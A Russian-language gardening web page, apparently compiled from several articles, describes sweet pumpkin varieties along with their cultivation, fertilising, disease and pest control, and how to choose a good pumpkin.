6 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Самые сладкие и вкусные сорта тыквы

Популярные сладкие сорта тыквы

Сладкие сорта тыквы представлены широким разнообразием. Ознакомившись с их описанием, вы сможете выбрать самый подходящий вид для своего участка. Главной особенностью данной группы является приятный и сахаристый вкус, универсальность применения не только в приготовленном, но и в сыром виде, а также возможность выращивания в разных широтах.

Популярные сладкие сорта тыквы

Общая классификация

Все сорта и гибридные формы сладких тыкв разделяют на три группы. Рассмотрим каждую из них.

  1. С твердой коркой. В эту группу входят сладкие сорта столового или кормового назначения. Они обладают длительным сроком хранения – до года.
  2. Мускатные. Тонкокорые овощи, с ярко-оранжевой мякотью, обладают приятным мускатным ароматом и повышенной сладостью — содержание сахара около 15 %. Преимущественно их выращивают в южной зоне страны. Готовят разные блюда, соки, пюре и мусс. Срок хранения – не более 3-х месяцев.
  3. Крупноплодные. Плоды отличаются большими размерами, округлой или вытянутой формой с желтой или оранжевой мякотью. Урожай обладает продолжительной лежкостью и товарностью. В эту группу входят самые сладкие сорта тыквы — некоторые даже слаще арбуза.

Калорийность плодов небольшая, всего лишь 28 ккал на 100 г.

Популярные разновидности

Чтобы правильно выбрать хороший сорт для выращивания, стоит ознакомиться с подробным описанием всех разновидностей.

Пышка

Гибрид американской селекции — сдобная Пышка f1 относится к среднеспелым культурам (урожай созревает через 3-3,5 месяца).

Плоды напоминают по форме желуди, поверхность ребристая, кремового цвета с зелеными полосками. Внутри овощ оранжевый, мягкий.

Содержание сахара в мякоти — около 10 %, масса тыквы околов 7-8 кг, вкус сладкий и нежный.

На юге сорт выращивают семенным способом, в средних и северных широтах — рассадным.

Сладкая ромашка

Тыковки этого сорта достигают разных размеров — от 3 до 8 кг. Поверхность ребристая, форма шаровидная, слегка приплюснутая. Это тонкокорый плод с мягкой, мясистой, оранжевой серединой. Толщина мякоти — 10-12 см.

Урожай хорошо переносит транспортировку и хранится до самой весны.

Сорт Сладкая ромашка приспособлен к выращиванию в разных климатических условиях, формирует длинные побеги, поэтому нуждается в прищипке после завязывания одной пары плодов.

Сладкий Каштан

Тыковки компактного размера (вес около 600 г), с ребристой поверхностью оранжевого цвета, содержат зеленые пятнышки. Форма шаровидная, вкус сладкий и нежный.

После приготовления мякоть становится рассыпчатой.

Сорт Сладкий каштан подходит для посадки семенами на юге и рассадой – в прохладных регионах.

Медовый Десерт

Урожай этого сорта отличается терпким медовым вкусом и ароматом.

Плоды крупные — до 6-7 кг, некоторые экземпляры достигают 10-11 кг. Форма овощей — плоскоокруглая, с ребристой, оранжевой поверхностью и ярко-оранжевой серединой. Мякоть нежная, мягкая и очень сладкая.

Плоды отличаются отличным вкусом

Культура ранняя — сбор урожая проводят через 100-105 дней с момента посадки семян в грунт. Подходит для выращивания семенным и рассадным способом.

Волжская серая

Один из самых урожайных сладких сортов, который дает до 15 кг/м². Срок созревания — 100-115 дней. Овощи крупногабаритные — от 10 до 20 кг, серого цвета, шаровидной формы с небольшой ребристостью.

Мякоть сладкая, желтого цвета. Плоды созревают дружно, хранение продолжительное — до весны.

Сладкая зимняя

Овощ округлый, на концах слегка приплюснутый, со слабо выраженной ребристостью. Поверхность серого цвета, плотная, эластичная. Мякоть хрустящая, твердая, апельсинового цвета, обладает сладким вкусом и повышенной сочностью.

Масса плодов варьируется от 10 до 12 кг. Овощи лежат до самой весны без потери вкуса и товарности. Урожайность высокая — до 30 кг/м².

Сладкий зимний сорт позднеспелый (овощи созревают через 5-5,5 месяцев после появления ростков).

Универсальность посадки — подходит для выращивания рассадным и семенным способом.

Желтый центнер

Эта тыква самая сладкая и вкусная, рекордсмен по содержанию сахара (около 16%).

Плоды гигантских размеров — достигают 50 кг. При выращивании на земле богатой органикой и минеральными удобрениями можно получить плоды весом от 100 до 200 кг.

На одном растении формируется по 5-7 завязей. Овощ округлой формы, слегка приплюснутый по краям, ярко-оранжевого цвета.

Срок созревания — около 3 месяцев с момента появления всходов. Выращивается как в частном, так и промышленном садоводстве. Срок хранения — до 6 месяцев.

Грибовский

У этого сорта есть несколько разновидностей — кустовая, твердокорая и зимняя.

Первые два гибрида формируют овальные плоды, небольшого веса — от 3 до 5 кг, к полной технической зрелости они обретают оранжевый окрас.

Поверхность некоторых экземпляров покрыта размытыми зелеными полосками. Сбор урожая осуществляют через 90-100 дней с момента посадки семян.

Зимний вид дарит шаровидные тыковки, плоскоокруглой формы, серого цвета. Срок созревания — 140-150 дней.

Середина плотная, сочная и сладкая, апельсинового окраса. По содержанию сахара сорт не выделяется среди других, показатели средние — около 10-12 %.

Урожай обладает хорошей лежкостью — хранится более полугода.

Парижская золотая

Главные достоинства сорта:

  • высокая засухоустойчивость;
  • среднеспелость — урожай созревает на 110-115 день с момента прорастания семян;
  • хорошая товарность и лежкость до весны;
  • сладкий, приятный вкус;
  • подходит для детского питания.

Плоды шаровидной формы, небольшого веса — от 5 до 10 кг, золотистого цвета с оранжевой серединой. Сажать допускается как семенным, так и рассадным способом.

Тонкости выращивания

За растениями нужно хорошо ухаживать

Успех в выращивании культуры зависит от качества посевного материала, соблюдения правил посадки и ухода за рассадой и кустами в открытом грунте.

Семенной материал

Для посева используют свежий посевной материал, полученный из прошлого урожая. Сначала проводят отбраковку семян — выбирают экземпляры приблизительно одинакового размера, без черных пятен, желтизны и признаков плесени.

Отобранные семечки опускают в слабый раствор марганцовки для дезинфекции на 30 минут, затем вымачивают в теплой воде (50-55°С) 2-3 часа.

Для повышения процента всхожести в воду можно добавить древесную золу или препарат Эпин. Перед посадкой семена слегка просушивают, чтобы они не были скользкими.

Техника посева

Посадка семян на рассаду осуществляется в последней декаде марта или в первых числах апреля. Сажают в универсальный грунт для выращивания овощных культур.

Также можно использовать смесь домашнего приготовления —смешать огородную землю с перегноем, торфом и песком в пропорции 3:2:2:1. Дополнительно в такую почву добавляют нитрофоску — 1 ч. л. на 1 кг грунта.

Для посадки лучше использовать одноразовую тару размером — 6х6 см. В дальнейшем это облегчит процесс пересадки растений на грядку методом перевалки земляного кома.

В каждую емкость закладывают по 2 семени на глубину до 2 см, затем присыпают грунтом, орошают водой и накрывают пленкой или стеклом.

Уход за посевами

До момента прорастания семян посевы держат в условиях комнатной температуры с рассеянным дневным светом. Их периодически проветривают, опрыскивают по мере просыхания грунта.

После появлении ростков — примерно через неделю, нужно провести отбраковку — более крепкий росток оставляют, а слабый отщипывают. Затем проводят подкормку нитрофоской — 1 ч. л. вещества на ведро воды. Такое удобрение стимулирует рост зеленой массы, корней и поможет вырастить крепкую рассаду.

Перед высадкой на участок ростки тыквы закаливают — выносят на улицу в теплые деньки и оставляют на несколько часов. За сутки до пересадки растения должны переночевать на улице.

Правила пересадки

Пересадку проводят, когда рассада окрепнет, достигнет высоты около 30 см и обрастет листвой — не менее 5 листиков на одном кусте. Обычно эту процедуру проводят в конце мая.

Место

Тыква — теплолюбивая культура, которая дает хорошие урожаи на солнечном месте. Поэтому старайтесь подобрать участок с такими условиями.

Сажать ее рекомендуется после капусты, свеклы, лука, бобовых и картофеля. Важно, чтобы место был безветренным и без застоя воды.

Грунт

Тыквы необходимо удобрять

Грядку посыпают перегноем (10 кг), золой (3 кг), суперфосфатом и калийной солью — по 80 г. Такой расход идет на 1 м². Затем почву перекапывают и выравнивают граблями.

За три недели до планируемой пересадки ростков или посева семян в суглинистую почву вносят:

  • 20 г суперфосфата;
  • по 10 г калийной соли и аммиачной селитры;
  • 250 г древесной золы.

Для улучшения состава супесчаной земли потребуется:

  • 4 кг перегноя;
  • 40 г суперфосфата;
  • 0,5 кг золы.

Расход питательных веществ рассчитан на 1 м². После внесения удобрений участок перекапывают, разравнивают и обильно проливают методом дождевания.

Схема

Посадочные лунки вырывают на расстоянии 80 см друг от друга, дистанция в ряду — 1 м. Размеры ямок для рассады 4х4 см, для посева семян — 2х2 см. Семена высевают в последней декаде мая или в первых числах июня.

Требования по уходу

Чтобы получить хороший урожай крупных и сладких овощей, посадкам нужно оказать должное внимание и уход.

Поливают тыкву часто, но умеренно, т. к. эта культура плохо реагирует на переливы и быстро загнивает. Используют отстоянную и не холодную воду. Увлажнение проводят под корень. На одно растение расходуют по 2 л.

До того, как растение обрастет листвой, грунт рыхлят и удаляют сорняки — раз в неделю.

Для вьющихся сортов устанавливают опоры и периодически укладывают плети в нужном направлении.

Для получения крупного урожая необходимо проводить нормировку завязей: на одном побеге оставляют не более 3-х плодов.

Подкормка

За весь сезон эту культуру нужно подкормить три раза:

  1. Через неделю после высадки рассады в открытый грунт. При семенном выращивании в открытом грунте первое удобрение вносят через 10 дней после появления всходов. Используют раствор коровяка — на ведро воды 1 л вещества. Под каждое растение выливают 0,5 л питательного состава.
  2. После появления первых цветков. Используют раствор из 7-8 г суперфосфата, 5 г калийной соли и 5 г аммиачной селитры. Сухую смесь растворяют в ведре воды.
  3. Через две недели после цветения. Используют такой же состав, что и в период цветения кустов.

Болезни

Лечить растения нужно вовремя

Грибковые, вирусные и бактериальные инфекции могут повреждать тыквы на разных этапах роста и развития, и привести к потере всего урожая. Поэтому так важно вовремя их распознать и уничтожить.

Тыква часто повреждается несколькими заболеваниями:

  1. Бактериальная пятнистость. Признаки — появление бурых пятен в виде язвочек сначала на листве, затем на плодах.
  2. Белая гниль проявляется белесыми пятнами на всех органах растения. Со временем они становятся водянистыми, буреют и загнивают.
  3. Корневая гниль. Поражает корневую систему и листву на тыквах. Грибок перекрывает доступ кислорода и влаги к корням, в результате этого вся надземная часть начинает желтеть и осыпаться.
  4. Мучнистая роса. Признак — появление белого налета в виде муки на листве, затем на стеблях, цветках и плодах. Позже он темнеет и вызывает гниль пораженных участков.
  5. Антракноз (медянка). Листовая пластина покрывается черными язвочками. В местах поражения начинается процесс гниения.

Для профилактики следует обеззараживать семена перед посадкой в марганцовке, поддерживать огород в чистоте, избегать переливов, вовремя подкармливать и удалять поврежденные участки.

Также следует соблюдать правила севооборота — высаживать тыкву на прежнем месте можно только через три года.

Болеющие кусты освобождают от зараженных частей, затем опрыскивают фунгицидами — медным купоросом или бордоской жидкостью.

Вредители

К главным вредителям тыквы относятся:

  1. Паутинный клещ. Насекомое селится на нижней стороне листовой пластины, окутывая ее мелкой паутинкой. В местах паразитирования листья обретают мозаичную раскраску и со временем усыхают.
  2. Тля бахчевая. При массовом нашествии гибнет все растение, т. к. эти паразиты питаются соком листьев, побегов и цветков.
  3. Муха ростковая. Насекомое откладывает яйца, из них вылупливаются личинки — главные вредители растения. Они выедают всю внутренность, в результате стебель чернеет и увядает вместе с листом.

Для уничтожения вредителей используют пестициды — карбофос, дихлофос. Также эффективными считаются инсектициды — Актеллик, Актара, Фундазол, Каратэ.

Как выбрать самую вкусную тыкву?

Выбрать тыкву из десятка оранжевых красоток, которые сейчас продаются на рынках и в магазинах, непросто: большие и маленькие, круглые, вытянутые, грушевидные, самых разных оттенков. Одни вкусные, другие – не очень. Как определить, какая тыква лучше?

Как выбрать хорошую тыкву?

У хорошей тыквы кожура плотная, но не «деревянная». Разумеется, на ней не должно быть трещин и мягких мест, темных пятен – последние говорят о том, что тыква начала гнить. Выбирая тыкву, не стоит гнаться за гигантскими. У слишком крупных, переросших плодов мякоть может быть сухой, водянистой и горчить.

У спелых тыкв хвостик темный и сухой. Если хвостика нет – лучше не покупать, возможно, продавец избавился от него нарочно, так как овощ сорван раньше срока и созреть не успел. К тому же даже самая лучшая тыква, оставшаяся без плодоножки, хранится намного меньше.

Мякоть тыкв, «переболевших» грибковыми заболеваниями, будет очень невкусной и горькой. О вероятном поражении могут говорить вмятины, темные или розоватые пятна на кожуре. Также часто недобросовестные продавцы срезают пораженные участки – и продают тыкву по кусочкам.

Какая тыква лучше? Все зависит от того, что из нее нужно приготовить и как долго ее планируется хранить. Чаще всего на рынках и в магазинах встречаются три вида тыкв: твердокорая, мускатная и крупноплодная. Есть еще декоративные, но в пищу они обычно не пригодны.

На рынках можно найти десяток самых разных сортов тыкв

Выбираем мускатную тыкву

Многие считают мускатную тыкву лучшей и самой вкусной.

У мускатных тыкв вытянутая форма, плод может быть похож на большой кабачок, огурец-переросток или гигантскую грушу, а кожица у него тонкая и легко режется ножом. Тыквы этого вида часто утолщаются ближе к цветку, где у них сосредоточены семечки. Мускатные тыквы самые сладкие, поэтому они идеальны для запекания и десертов. Также в них особенно много витаминов-каротиноидов.

В общем, лучшая тыква, на взгляд многих, если бы не одно «но»: мускатные сорта хранятся меньше других, и чем дольше они лежат – тем меньше в них остается сладости и витаминов. Плоды, пролежавшие до зимы, становятся несладкими.

Выбираем крупноплодную тыкву

Главный отличительный признак крупноплодной тыквы – круглая, приплюснутая форма. Именно такую тыкву большинство из нас представляет себе, когда заходит речь о Хэллоуине.

Чаще всего кожура у крупноплодных тыкв ярко-оранжевая, но она может быть и желтой, серой, зеленой. Крупноплодную тыкву лучше выбрать, если покупка совершается впрок: она хранится долго и, полежав, становится только вкуснее. В только что собранных плодах много крахмала, но со временем он превращается в сахар. Храниться крупноплодные тыквы могут до весны.

Чем толще кожура, тем дольше тыква хранится

Выбираем твердокорые тыквы

Твердокорая тыква по форме похожа на яйцо, ее кожура чаще всего зеленоватая и, как и следует из названия, очень твердая, разрезается с трудом.

Еще один отличительный признак, по которому можно выбрать твердокорую тыкву – ее плодоножка имеет своеобразные грани и на срезе похожа на звездочку. Этот вид совсем несладкий. Такая тыква лучше подходит для приготовления мясных блюд и гарниров, когда излишняя сладость портит вкус. Хранятся ее плоды мало. Но зато у твердокорой тыквы самые полезные и вкусные семечки, которые, к тому же, очень легко чистятся. Есть сорт, который называется «Голосемянная» – ее семечки не нужно чистить вообще.

Цвет тыквенной мякоти зависит от количества в ней витаминов-каротиноидов. Чем больше провитамина А и других каротиноидов, тем ярче мякоть. Причем у тыкв с бледно-желтой или зеленоватой кожурой может оказаться самая яркая, оранжевая мякоть!

При готовке не удаляйте волокна в самом центре тыквы — в них вся сладость этого овоща!

Самые сладкие сорта тыквы и как их правильно подобрать — советы опытного огородника

На сегодняшний день существует более 800 сортов и гибридов и только 35 из них являются действительно сахарными и еще меньше хорошо подходят для домашнего выращивания. Какие же сорта тыквы являются наиболее вкусными и сладкими, и какой вариант подходит именно для вас – читаем и выбираем далее!

Раннеспелые сладкие сорта тыквы

Несмотря на огромное количество разных сортов и на то, что практически все из них очень вкусные, сочные и питательные, стоит выделить из них самые сладкие и раннеспелые сорта.

Тыква Мускатная – наиболее яркий представитель этого класса. Содержание сахара — до 9%, что является очень хорошим показателем для тыкв. При достойном уходе за растением и использовании листовой подкормки ее вес может достигать до 100 кг, но среднестатистический вес составляет 25-40 кг. Любит солнце, в тени растение накапливает меньше сахара. Обильный полив будет большим плюсом. Срок до технического созревания – 90 дней.

Тыква Баттернат – известный на территории России сорт, его легко определить по грушевидной форме, гладкой поверхности. Считается, что именно такая тыква больше всего подходит для приготовления каши, хотя содержание сахара, как правило, не превышает 5.5-6 %. Тыква небольшая, при хорошем поливе и удобрении ее масса будет около 30 кг, а среднестатистическая – 9-15 кг. Срок до полного созревания – 100 дней.

Тыква Лечебная – один из лучших раннеспелых сортов в Европе и России, срок до полного созревания – 96-113 дней, отличается хорошими вкусовыми качествами, имеет хрустящую корку. Сахар – 8-9 %, средняя масса плода – до 30 кг. Неприхотлива к заболеваниям и морозам, поэтому садить можно даже при небольших заморозках.

Самые сладкие сорта тыквы – среднеспелые сорта с наибольшей урожайностью

Тыква Миндальная – сорт неприхотлив к погодным условиям и хранению. Ее можно содержать в подвале на протяжении всей зимы и плод не будет подвергаться гниению. Содержание сахара – 6 -7 %, но она обладает необычным, своеобразным вкусом: корка хрустит, получается отличная каша, быстро разваривается. Масса плода редко превышает 5 кг, но при хорошем уходе вырастает до 15 кг.

Тыква Мраморная – одна из лучших позднеспелых сортов, чрезвычайно сладкая (до 13 % сахара), имеет небольшую кислинку, нетвердую корочку и быстро готовится. Наилучше подходит на варенье, каши, для выдавливания свежего сока. Масса плода небольшая – 5 кг, до технического созревания 140 дней после всходов. На 1 кв.м. площади можно собирать до 25-30 кг тыквы.

Амбар – один их лучших среднеспелых сортов тыквы, отличается хорошей устойчивостью к заболеваниям, неприхотлив к засухе, а также не требует сильного удобрения. Среднестатистический плод имеет вес 5-7 кг, вместительность сахара не менее 7%. Одним из основных преимуществ является длительное хранение – тыкву можно держать в подвале на протяжении одного года и она не поддается гниению, не теряет вкусовые качества. Срок вегетации до технического созревания – 135-140 дней. Благодаря высокой плотности посадки, урожайность составляет до 40кг на 1кв.м.

Среднеспелые сорта пользуются очень большой популярностью, так как их удобно садить (нет необходимости в очень ранней посадке), они имеют относительно хорошую урожайность и равномерно созревают!

Самая сладкая тыква – выбираем позднеспелые сорта

Грибовская зимняя – сорт позднеспелой тыквы, очень сладкий (содержание сахара до 12 %), имеет вкусную, сочную мякоть, хрустящую корку. Срок до технического созревания – 155-160 дней. При внесении жидких удобрений масса плода достигает 5-6 кг. Мякоть имеет яично-желтый цвет, легко отделяется и готовится при невысоких температурах. Урожайность достигает 20-25 кг на 1 кв.м. за счет повышенной плотности посадки и хорошего роста стебля.

Тыква Зимняя Сладкая – большая (до 20 кг) тыква, которая до технического созревания растет 140-150 дней. Содержание сахара – 11-12%, зависит от полива и места возрастания. При нахождении в тени количество сахара резко уменьшается. Растение неприхотливо к вредителям, периодические обработки ядохимикатами не требуются.

Тыква Заря Востока – неплохой позднеспелый сорт, имеет красивый внешний вид, специфические вкусовые качества: присутствует кислинка, корка хрустящая и сладкая, при употреблении тыквы за неделю-две до технической спелости можно ощутить запах свежего тростника. Растет до 8-10кг, содержание сахара до 11%, сорт неприхотлив к погодным условиям и хранению. Срок созревания – 140-155 дней.

Сладкие сорта тыквы – а надо ли выбирать самую сладкую?

«Не все золото, что… сахара много содержит». Стоит заметить, что самые сладкие сорта тыквы, как правило, нуждаются в очень хороших условиях для роста: обильная влага, много солнца, много жидких удобрений и тому подобное. Зачастую даже самая сладкая тыква с содержанием сахара в 13% может набрать всего 4-5%, так как рассчитана на более южные широты, где больше солнца. Именно поэтому при выборе надо учитывать:

  • акклиматизацию сорта;
  • его среднестатистическую, а не максимальную урожайность именно в своем районе;
  • необходимость «лабораторного» ухода и возможность роста на даче.

Лучше всего брать сорта, которые имеют среднюю урожайность, небольшие размеры и немного выше среднего содержание сахара. Сладкая тыква, сорта которой мы рассмотрели выше, будет идеальным вариантом для вашей дачи и даст результат, на который вы будет рассчитывать.

И помните, что тыква – это не только сладкий овощ, но еще и более 3 десятков витаминов, полезных веществ и минералов, поэтому, независимо от выбранного вами сорта, вы сажаете здоровье!

Тыква: описание 30 лучших сортов. Общие сведения и классификация, сорта для разных регионов России | (Фото & Видео) +Отзывы

Тыква: описание 30 лучших сортов

Предлагаем Вам ознакомимся с описанием наиболее популярных сортов тыквы. Наверное, нет в России дачных участков, где бы ни росла тыква. Её история насчитывает множество веков. Известно, что тыкву использовали ещё жители племени майя, зная о её целебных свойствах. Этот овощ имеет большое преимущество среди всех остальных – его можно долго хранить, а в пищу можно употреблять не только сочную мякоть, но и полезнейшее семя.

Содержание:

Общие сведения и классификация

Семейство тыквенные включает в себя 27 видов. Из каждого выведено огромное количество сортов.

В нашей стране чаще всего выращивают 3 вида тыквы:

  • К твёрдокорым видам (обыкновенная тыква) относятся овощи с толстой, деревянистой кожурой. Они, обычно, созревают раньше всех – в конце лета, начале осени.
  • Мускатные тыквы любят тепло, поэтому лучше всего плодоносят на территориях с тёплым климатом. Вегетационный период у них длинный, чаще всего, в нашей стране их нужно высаживать на рассаду.
  • Крупноплодные тыквенные образуют самые большие, сладкие плоды. Они лучше всего подходят для долгого хранения, выращивания в холодных частях страны.
  • Существует сорт томатов под названием фиолетовая тыква.

По назначению тыквы делятся на:

  • столовые сорта
  • кормовые
  • декоративные

Опишем различные сорта для выращивания в различных регионах России, вкусу и т.д.

Мускатная тыква

  • Мускатная тыква одна из самых любимых представителей семейства тыквенных среди дачников. Она родом из Мексики. Получила своё название за тонкий мускатный аромат.
  • Её популярность связана со вкусовыми качествами, насыщенным цветом мякоти, долгим сроком хранения. Поэтому мускатную тыкву ещё называют зимней. После долгой лёжки её мякоть приобретает более насыщенный цвет. Но не рекомендуется хранить овощи более полугода.
  • Этот вид включает в себя множество сортов. Все они имеют различную форму и цвет. У большинства разновидностей плоды удлинённой формы – грушевидной, овальной, цилиндрической.
  • Отличительным признаком этой группы растений является пятигранная плодоножка тыковки. Но у всех представителей тонкая кожура, которая легко очищается.
  • Мускатная тыква лучше всего подходит для выращивания в южных регионах страны. В средней полосе России можно сажать её с помощью рассады или в парниках, теплицах.
  • Почти все сорта с поздним сроком созревания.

Испанская гитара

  • Растение получило название за необычную форму плодов, весом до 8 кг. Длина овощей зависит от плодородия почвы и колеблется в пределах 70-100 см, диаметр – около 17 см.
  • Это среднеспелый сорт, который обладает хорошей лёжкостью и по вкусу напоминает абрикосы. Семян в плотной мякоти мало, расположены они только в утолщённой части овоща.
  • Тонкая кожура, внутренняя часть тыквины оранжевого цвета. На поверхности плода нет ребёр.
  • Сорт подходит для употребления в сыром виде, но пока не получил широко распространения в нашей стране.

Цукатная

  • Первый урожай цукатной тыквы собирают через 4-5 месяцев после появления ростков. Сорт относиться к среднепоздним.
  • Плоды светло-коричневого цвета округло-приплюснутой формы. После созревания их средний вес – 5 кг. Внутренняя часть сахаристая, хрустящая, оранжевого цвета.
  • Цукатную тыкву широко используют для изготовления кондитерских изделий, лечебного, детского питания.
  • Собранный урожай можно перевозить, хранить длительное время.

Витаминная

  • Поздний сорт мускатной тыквы, плоды которой полностью созревают не менее, чем через 3,5 месяца после появления первых всходов. Одно растение, обычно, образует 2-3 плода.
  • Овальные ребристые тыквины, весом до 5 кг. Кожура тонкая, оранжевого цвета. Мякоть сочно оранжевого цвета, плотная и хрустящая. На вкус сладкая. Широко используется для изготовления сока, кондитерских изделий, а также подходят для употребления в свежем виде.
  • Плоды можно хранить, но небольшой промежуток времени.

Мраморная

  • Сорт со средним сроком созревания плодов, предназначенный для посадки в тёплых регионах России. В среднем, первый урожай собирают через 4 месяца и 10 дней после появления первых ростков.
  • Кусты образуют зелёно-серые тыквины сплюснутой округлой формы, массой 6-10 кг. Их мякоть рыхлая, оранжевого цвета, приятная на вкус. Кожура после созревания приобретает зелёный, серый цвет.
  • Сорт подходит для транспортировки на длительные расстояния. Плоды не трескаются и не гниют.
  • При низких температурах воздуха тыквины можно хранить в течение продолжительного времени – около 1 года.

Мускат де прованс

Мускат де прованс

  • Выведен Французскими селекционерами.
  • Первыми плодами «муската де прованс» можно насладиться через 110 дней после появления всходов.
  • Они имеют округлую, приплюснутую форму, набирают массу не более 4 кг.
  • Плод снаружи оранжевого цвета с множеством ребёр.
  • Внутри тыквина оранжевого цвета, плотной консистенции, сладкая и сочная.
  • Овощи можно собрать ещё до полного созревания и долго хранить при температуре 8-10 C.

Ореховая

  • Растение имеет ещё одно не менее известное название – баттернат, или мосхата. Она была получена израильскими учёными, путём скрещивания африканской и разновидности мускатной тыквы.
  • Одна из немногочисленных представительниц группы, которая поспевает через 3-3,5 месяца.
  • Растение лучше всего плодоносит, когда на одном кусте оставляют не больше 5 плодов, которые при созревании весят 1-1,2 кг.
  • Сам овощ имеет удлинённую форму и по виду напоминает кабачок. Цвет плотной кожуры и мякоти жёлтый. Плод внутри волокнистый, сочный, с лёгким ореховым ароматом и небольшим количеством семян.
  • У растения есть один минус – для получения вкусных, ароматных плодов ей требуется должный уход.
  • Баттернат можно срывать ещё до полного созревания. Овощи дозревают и вне куста, что позволяет дольше хранить их. Обычно их срывают в конце лета, начале осени, если есть риск похолодания.
  • Плоды можно использовать как для приготовления различных сладких блюд, так и добавлять к мясу. Любители сырых овощей могут использовать её в необработанном виде.

Сорта с крупными плодами

  • Дачники не очень любят сорта, которые образуют большие тыквины, так как за один раз овощ не съешь, а хранить его в городской квартире крайне неудобно.
  • Крупноплодная тыква включает в себя около 100 сортов.

Тыква фонарь

  • Относится к разновидности крупноплодной тыквы. Для созревания плодов необходимо 3-3,5 месяца.
  • Снаружи они гладкие, оранжево — розового цвета, слаборебристые.
  • Форма округлая, чуть вытянутая.
  • Каждый экземпляр весит 5-6 кг. Внутренняя часть нежная жёлто-оранжевого цвета, хрустящая, сочная.
  • Сорванная тыковка может храниться 3-3,5 месяцев. Сорт подходит для перевозки.
  • Собранный урожай подвергают термической обработке. Используют для изготовления соков, пюре.
  • Растение относится к теплолюбивым, засухоустойчивым. Посадки может поражать мучнистоя роса, бактериоз.

Русская каша

  • Относится к крупноплодной разновидности. Для получения первых плодов может понадобиться до 4 месяцев.
  • Сорт считается среднеспелым. Один куст образует 3-4 тыквины, массой 6-7 кг оранжево-розового цвета.
  • Форма их округлая, с малозаметной ребристостью.
  • Внутренняя часть средней плотности, окрашена в оранжевый цвет. Вкусовые качества хорошие.
  • Плоды можно хранить.
  • По названию уже можно предположить, что сорт отлично подходит для тушения, запекания, варки.
  • Также можно использовать для консервирования, употреблять в необработанном виде.

Разновидности твёрдокорой тыквы

К этой же группе относятся и кабачки, патиссоны

  • Эту разновидность чаще всего можно встретить на Российских участках.
  • Твёрдокорым сортам свойственен длинный стебель растений – до 7 м. Их ещё называют столовыми.
  • Но существуют и растения с короткими стеблями.

Плюшка

  • Ранний сорт. Для получения первых тыквин необходимо около 3 месяцев.
  • Плоды небольшие – 1,5 кг, окрашены в оранжевый цвет. Белые полосы разделяют его на сегменты.
  • Внутренняя часть сахаристая, сочная, оранжевого цвета.
  • Сорт подходит для хранения. Собранный урожай можно употреблять в свежем виде, использовать для изготовления соков, диетических блюд и т.д.

Голосеменная

  • Голосемянной тыквой называют группу растений, у которых семена не покрыты твёрдой оболочкой. Данная разновидность была известна ещё в начале XX века, но в нынешнее время снова начала набирать популярность.
  • Внешне плоды не отличаются особой привлекательностью – зелёно – жёлтого цвета. Снаружи покрыты плотной, твёрдой, но тонкой кожурой. По форме округлые, с малозаметной ребристостью, массой 3-7 кг.
  • Первый урожай собирают через 4 месяца после появления всходов. Срок хранения плодов длиться около 2 месяцев.
  • Мякоть используют как в необработанном виде, так и для приготовления различных блюд, а также в косметологии, медицине. Некоторые источники утверждают, что лучше всего использовать тыквины через несколько недель после сбора. К этому моменту они раскрывают весь свой вкус.
  • Чаще всего, этот сорт выращивают именно для семян. Представителей голосеменных овощей рекомендуют сажать подальше от других тыквенных, так как они могут перекрёстно опыляться. В этом случае, семя уже будет с плотной оболочкой.

Наиболее известные сорта голосеменной тыквы:

Лучшие сорта тыквы

О пользе тыквы знают жители практически всех стран мира.

Однако не все домохозяйки и огородники, выращивая овощное растение и делая из него лакомые блюда, знают, что существует огромное множество видов этой культуры. И каждый из них имеет свое название и особенности.

ОПИСАНИЕ КУЛЬТУРЫ

Овощное растение, относящееся к роду Cucurbita, имеет 18 разновидностей. Из них только 3 видам характерна пищевая ценность, остальные могут рассматриваться в виде кормовых и декоративных сортов.

История появления этого растения имеет очень древние корни. Родиной, где впервые начали возделывать тыквенные растения, считается Центральная Америка. При этом несколько подвидов были обнаружены в Африке и Малой Азии.

В Россию тыква была завезена в 19 веке. C того времени культура стала рассматриваться как ценный пищевой продукт. Тыкву, употребляемую в пищу, селекционеры делят на три вида:

  1. Твердокорая. Данный вид представлен на рынке овощей десятками сортов. Среди них встречаются кустообразные, плетистые и декоративные культуры. В эту категорию входят также кабачки и патиссоны, корка у которых набирает твердость на протяжении всего периода созревания.
  2. Крупноплодная. Получила популярность во всем мире. В России сорта данного вида могут набирать вес до 60 килограмм, при этом показатель сахаристости у них составляет 15%.
  3. Мускатная. Относится к самым вкусным сортам. По внешним характеристикам она имеет схожесть с твердокорыми и крупноплодными растениями. Однако мякоть мускатного вида с ними не сравнима: сахаристость у них доходит до 11%, структура плотная, маслянистая, аромат нежный. Представлен этот вид многими сортами, но для приготовления пищи наибольшее предпочтение огородники отдают сорту грушевидной формы. В России выращиваются холодостойкие сорта, в которых плоды вызревают за 3-4 месяца.

Пищевая ценность тыквы обусловлена ее богатым составом. В этой культуре содержится большое количество пектина. В оранжевых сортах присутствует каротина больше, чем у моркови. Также польза овоща объясняется наличием в ней таких минеральных веществ, как фосфор, калий, кальций и железо.

Максимальная сахаристость самых сладких плодов составляет 15%. При этом следует знать, что на содержание сахара влияют условия выращивания растения. Чем больше плоды получают солнца и тепла в период созревания, тем слаще становится их мякоть.

СЛАДКИЕ СОРТА ТЫКВЫ

Наибольшей популярностью в мире пользуются сорта тыквы со сладкой мякотью, так как кроме вкусных блюд из них можно изготавливать сок. Чтобы при выращивании овощ достиг высокого показателя сахаристости, следует правильно выбирать сорта.

Специалисты советуют отдавать предпочтение позднеспелым и среднеспелым вариантам, так как раннеспелые не успевают собрать достаточное количество углеводов.

Чтобы подобрать самый вкусный и сладкий сорт тыквы, следует внимательно изучить его описание, узнать об условиях его выращивания и хранения.

Рассмотрим самые сладкие сорта:

  • «Пышка». Является гибридом, созревание ее длится 100 дней. По форме плоды похожи на желудь. Они ребристые, кремового цвета с твердой кожурой. Максимальный вес овоща доходит до 8 кг. Нежная мякоть может содержать до 10% сладости.
  • «Сладкая ромашка». Растению характерны круглые, ребристые, сплюснутые на полюсах плоды. Оранжевая корочка у этого сорта прочная, но тонкая. Толщина мякоти составляет около 10 см. Растение устойчиво к засушливой и прохладной погоде, плоды вырастают до 8 кг. Из овоща можно варить каши и вкусное детское питание, получать нежные цукаты. Этот сорт тыквы любят добавлять в выпечку.
  • «Каштан». Тыква является гибридом, вес плодов не превышает 600 г, форма закругленная, ребра заметны слабо, сладкая мякоть имеет крахмалистую структуру. Наилучшие блюда из этого сорта – это тыква, фаршированная кашей (суфле) и запеченная в духовке. Выращивают овощ из рассады, пересаживая в землю при прогреве воздуха до 20⁰С.
